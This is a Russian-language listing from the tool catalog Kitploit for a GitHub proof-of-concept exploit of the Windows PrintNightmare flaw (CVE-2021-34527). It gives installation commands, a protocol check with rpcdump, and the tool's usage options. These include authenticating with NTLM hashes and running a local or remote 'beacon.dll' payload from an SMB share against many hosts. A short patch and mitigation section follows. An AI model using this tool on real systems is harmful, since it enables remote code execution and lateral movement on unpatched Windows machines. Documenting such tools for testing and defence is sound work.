Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-34527 — PrintNightmare (CVE-2021-34527) PoC-эксплойт | Kitploit
Инструменты/GitHubGitHub/m8sec/cve-2021-34527
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЛатеральное перемещениеТестирование на Проникновение
GitHubm8sec/cve-2021-34527

CVE-2021-34527

PrintNightmare (CVE-2021-34527) PoC-эксплойт

Репозиторий
118193 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PrintNightmare (CVE-2021-34527)

Эта версия эксплойта PrintNightmare основана на коде, созданном Cube0x0, и имеет следующие возможности:

  • Возможность нацеливания на несколько хостов.
  • Встроенный SMB-сервер для доставки полезной нагрузки, устраняющий необходимость в открытых файловых ресурсах.
  • Эксплойт включает оба протокола MS-RPRN и MS-PAR (определяются в аргументах CMD).
  • Реализует технику UNC bypass от @gentilkiwi.

Установка

Перед запуском установите последнюю версию impacket:

root@kitploit:~
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install

git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h

Тест

Инструмент rpcdump.py из Impacket можно использовать для проверки наличия протоколов MS-PAR и MS-RPRN:

root@kitploit:~
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Альтернативно, сканер ItWasAllADream от byt3bl33d3r можно использовать для сканирования целей и проверки уязвимости удаленного выполнения кода (RCE) PrintNightmare.

Скриншоты

pnm

Использование

root@kitploit:~
  -v VERBOSE            Enable verbose logging from SMB server
  -t TIMEOUT            Connection timeout

Authentication:
  -u USERNAME           Set username
  -H HASH, -hashes      Use NTLM Hash for authentication
  -p PASSWORD           Set password
  -d DOMAIN             Set domain
  --local-auth          Authenticate to target host, no domain

DLL Execution:
  -dll DLL                  Path to local DLL file to execute "beacon.dll"
  --remote-dll REMOTE_DLL   Remote dll "\\192.168.1.25\Share\beacon.dll"
  -share SHARE              Set local SMB share name
  --local-ip LOCAL_IP       Set local IP (defaults to primary interface)

Target(s):
  -pDriverPath PDRIVERPATH  Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
  -port [destination port]  Destination port to connect to SMB Server
  -proto {MS-RPRN,MS-PAR}   Target protocol (Default=MS-RPRN)
  target                    192.168.2.2, target.txt, 10.0.0.0/24 (positional)

Устранение уязвимости

Microsoft выпустила несколько исправлений для PrintNightmare, последнее из которых вышло в рамках Patch Tuesday сентября 2021 года. Это устранило основную уязвимость и обнаруженные впоследствии обходные пути. Для получения дополнительной информации посетите официальное руководство Microsoft:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

Дополнительные стратегии для смягчения этой уязвимости включают:

  • Отключение службы диспетчера печати (Print Spooler) на не критичных системах.
  • Отключение входящей удаленной печати через групповую политику

Благодарности

  • @cube0x0 — за код Python эксплойта и его вклад в проект impacket.
  • @edwardzpeng и @lxf02942370 — за первоначальное обнаружение и эксплуатацию PrintNightmare.
Скачать инструмент